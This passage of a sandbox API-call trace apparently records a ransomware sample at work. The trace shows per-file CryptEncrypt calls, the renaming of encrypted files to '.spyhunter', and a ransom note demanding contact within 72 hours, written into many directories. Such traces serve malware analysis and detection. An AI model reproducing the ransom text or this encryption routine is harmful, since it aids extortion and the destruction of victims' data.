0x2c0000 [0084.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x328648 | out: hHeap=0x2c0000) returned 1 [0084.618] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfef0 | out: pbBuffer=0x25cfef0) returned 1 [0084.618] GetProcessHeap () returned 0x2c0000 [0084.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0084.618] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x25cfee8*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x25cfee8*=0x30) returned 1 [0084.619] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0084.619] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0084.619] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0084.619] GetProcessHeap () returned 0x2c0000 [0084.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x341830 [0084.619] ReadFile (in: hFile=0xb4, lpBuffer=0x341830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfeac, lpOverlapped=0x0 | out: lpBuffer=0x341830*, lpNumberOfBytesRead=0x25cfeac*=0x2800, lpOverlapped=0x0) returned 1 [0084.650] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.650] WriteFile (in: hFile=0xb4, lpBuffer=0x341830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfeac, lpOverlapped=0x0 | out: lpBuffer=0x341830*, lpNumberOfBytesWritten=0x25cfeac*=0x2800, lpOverlapped=0x0) returned 1 [0084.650] GetProcessHeap () returned 0x2c0000 [0084.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x341830 | out: hHeap=0x2c0000) returned 1 [0084.650] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.650] WriteFile (in: hFile=0xb4, lpBuffer=0x25cfeec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfeac, lpOverlapped=0x0 | out: lpBuffer=0x25cfeec*, lpNumberOfBytesWritten=0x25cfeac*=0x4, lpOverlapped=0x0) returned 1 [0084.851] WriteFile (in: hFile=0xb4, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfeac, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x25cfeac*=0x30, lpOverlapped=0x0) returned 1 [0084.851] CloseHandle (hObject=0xb4) returned 1 [0084.860] GetProcessHeap () returned 0x2c0000 [0084.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x34f030 [0084.860] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.spyhunter") returned 86 [0084.860] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.spyhunter" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.spyhunter")) returned 1 [0084.860] GetProcessHeap () returned 0x2c0000 [0084.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f030 | out: hHeap=0x2c0000) returned 1 [0084.860] GetProcessHeap () returned 0x2c0000 [0084.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0084.861] GetProcessHeap () returned 0x2c0000 [0084.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x327398 | out: hHeap=0x2c0000) returned 1 [0084.861] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfef0 | out: pbBuffer=0x25cfef0) returned 1 [0084.861] GetProcessHeap () returned 0x2c0000 [0084.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0084.861] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x25cfee8*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x25cfee8*=0x30) returned 1 [0084.861] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\.." (normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.861] GetProcessHeap () returned 0x2c0000 [0084.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0084.861] GetProcessHeap () returned 0x2c0000 [0084.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3309e8 | out: hHeap=0x2c0000) returned 1 [0084.861] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfee8 | out: pbBuffer=0x25cfee8) returned 1 [0084.861] GetProcessHeap () returned 0x2c0000 [0084.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3309e8 [0084.861] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3309e8*, pdwDataLen=0x25cfee0*=0x20, dwBufLen=0x30 | out: pbData=0x3309e8*, pdwDataLen=0x25cfee0*=0x30) returned 1 [0084.861] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\." (normalized: "c:\\program files\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.861] GetProcessHeap () returned 0x2c0000 [0084.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3309e8 | out: hHeap=0x2c0000) returned 1 [0084.861] GetProcessHeap () returned 0x2c0000 [0084.861] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x330970 | out: hHeap=0x2c0000) returned 1 [0084.861] CreateFileW (lpFileName="\\\\?\\C:\\PerfLogs\\$HOWDECRYPT$.txt" (normalized: "c:\\perflogs\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0084.862] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0084.862] WriteFile (in: hFile=0xb4, lpBuffer=0x25cfe1b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cff44, lpOverlapped=0x0 | out: lpBuffer=0x25cfe1b*, lpNumberOfBytesWritten=0x25cff44*=0x127, lpOverlapped=0x0) returned 1 [0084.862] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0084.862] WriteFile (in: hFile=0xb4, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cff44, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cff44*=0x2ac, lpOverlapped=0x0) returned 1 [0084.863] CloseHandle (hObject=0xb4) returned 1 [0084.863] GetProcessHeap () returned 0x2c0000 [0084.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30e538 | out: hHeap=0x2c0000) returned 1 [0084.863] CreateFileW (lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\$HOWDECRYPT$.txt" (normalized: "c:\\perflogs\\admin\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0084.863] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0084.863] WriteFile (in: hFile=0xb4, lpBuffer=0x25cfe17*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cff40, lpOverlapped=0x0 | out: lpBuffer=0x25cfe17*, lpNumberOfBytesWritten=0x25cff40*=0x127, lpOverlapped=0x0) returned 1 [0084.864] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0084.864] WriteFile (in: hFile=0xb4, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cff40, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cff40*=0x2ac, lpOverlapped=0x0) returned 1 [0084.864] CloseHandle (hObject=0xb4) returned 1 [0084.864] GetProcessHeap () returned 0x2c0000 [0084.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x330278 | out: hHeap=0x2c0000) returned 1 [0084.864] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfee0 | out: pbBuffer=0x25cfee0) returned 1 [0084.864] GetProcessHeap () returned 0x2c0000 [0084.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0084.864] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x25cfed8*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x25cfed8*=0x30) returned 1 [0084.864] CreateFileW (lpFileName="\\\\?\\C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.864] GetProcessHeap () returned 0x2c0000 [0084.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0084.864] GetProcessHeap () returned 0x2c0000 [0084.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bee8 | out: hHeap=0x2c0000) returned 1 [0084.864] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\$HOWDECRYPT$.txt" (normalized: "c:\\msocache\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0084.865] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0084.865] WriteFile (in: hFile=0xb4, lpBuffer=0x25cfe0f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cff38, lpOverlapped=0x0 | out: lpBuffer=0x25cfe0f*, lpNumberOfBytesWritten=0x25cff38*=0x127, lpOverlapped=0x0) returned 1 [0084.865] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0084.865] WriteFile (in: hFile=0xb4, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cff38, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cff38*=0x2ac, lpOverlapped=0x0) returned 1 [0084.866] CloseHandle (hObject=0xb4) returned 1 [0084.866] GetProcessHeap () returned 0x2c0000 [0084.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30e4a8 | out: hHeap=0x2c0000) returned 1 [0084.866] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\$HOWDECRYPT$.txt" (normalized: "c:\\msocache\\all users\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0084.866] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0084.866] WriteFile (in: hFile=0xb4, lpBuffer=0x25cfe0b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cff34, lpOverlapped=0x0 | out: lpBuffer=0x25cfe0b*, lpNumberOfBytesWritten=0x25cff34*=0x127, lpOverlapped=0x0) returned 1 [0084.867] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0084.867] WriteFile (in: hFile=0xb4, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cff34, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cff34*=0x2ac, lpOverlapped=0x0) returned 1 [0084.867] CloseHandle (hObject=0xb4) returned 1 [0084.867] GetProcessHeap () returned 0x2c0000 [0084.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fb30 | out: hHeap=0x2c0000) returned 1 [0084.867] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0084.868] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0084.868] WriteFile (in: hFile=0xb4, lpBuffer=0x25cfe07*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cff30, lpOverlapped=0x0 | out: lpBuffer=0x25cfe07*, lpNumberOfBytesWritten=0x25cff30*=0x127, lpOverlapped=0x0) returned 1 [0084.869] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0084.869] WriteFile (in: hFile=0xb4, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cff30, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cff30*=0x2ac, lpOverlapped=0x0) returned 1 [0084.869] CloseHandle (hObject=0xb4) returned 1 [0084.869] GetProcessHeap () returned 0x2c0000 [0084.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x328828 | out: hHeap=0x2c0000) returned 1 [0084.869] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfed0 | out: pbBuffer=0x25cfed0) returned 1 [0084.869] GetProcessHeap () returned 0x2c0000 [0084.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x30bbc0 [0084.869] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x30bbc0*, pdwDataLen=0x25cfec8*=0x20, dwBufLen=0x30 | out: pbData=0x30bbc0*, pdwDataLen=0x25cfec8*=0x30) returned 1 [0084.869] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.890] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 79 [0084.890] StrStrW (lpFirst="VisiorWW.xml", lpSrch=".txt") returned 0x0 [0084.890] GetProcessHeap () returned 0x2c0000 [0084.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x3620c0 [0084.890] ReadFile (in: hFile=0x158, lpBuffer=0x3620c0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfe8c, lpOverlapped=0x0 | out: lpBuffer=0x3620c0*, lpNumberOfBytesRead=0x25cfe8c*=0x2213, lpOverlapped=0x0) returned 1 [0085.263] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffdded, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.263] WriteFile (in: hFile=0x158, lpBuffer=0x3620c0*, nNumberOfBytesToWrite=0x2213, lpNumberOfBytesWritten=0x25cfe8c, lpOverlapped=0x0 | out: lpBuffer=0x3620c0*, lpNumberOfBytesWritten=0x25cfe8c*=0x2213, lpOverlapped=0x0) returned 1 [0085.264] GetProcessHeap () returned 0x2c0000 [0085.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3620c0 | out: hHeap=0x2c0000) returned 1 [0085.264] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.264] WriteFile (in: hFile=0x158, lpBuffer=0x25cfecc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfe8c, lpOverlapped=0x0 | out: lpBuffer=0x25cfecc*, lpNumberOfBytesWritten=0x25cfe8c*=0x4, lpOverlapped=0x0) returned 1 [0085.264] WriteFile (in: hFile=0x158, lpBuffer=0x30bbc0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfe8c, lpOverlapped=0x0 | out: lpBuffer=0x30bbc0*, lpNumberOfBytesWritten=0x25cfe8c*=0x30, lpOverlapped=0x0) returned 1 [0085.264] CloseHandle (hObject=0x158) returned 1 [0085.265] GetProcessHeap () returned 0x2c0000 [0085.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x341830 [0085.265] wnsprintfW (in: pszDest=0x341830, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.spyhunter") returned 89 [0085.265] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.spyhunter" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.spyhunter")) returned 1 [0085.266] GetProcessHeap () returned 0x2c0000 [0085.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x341830 | out: hHeap=0x2c0000) returned 1 [0085.266] GetProcessHeap () returned 0x2c0000 [0085.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30bbc0 | out: hHeap=0x2c0000) returned 1 [0085.266] GetProcessHeap () returned 0x2c0000 [0085.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x327908 | out: hHeap=0x2c0000) returned 1 [0085.266] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd0 [0085.394] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0085.394] WriteFile (in: hFile=0xd0, lpBuffer=0x25cfdff*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cff28, lpOverlapped=0x0 | out: lpBuffer=0x25cfdff*, lpNumberOfBytesWritten=0x25cff28*=0x127, lpOverlapped=0x0) returned 1 [0085.395] lstrlenA 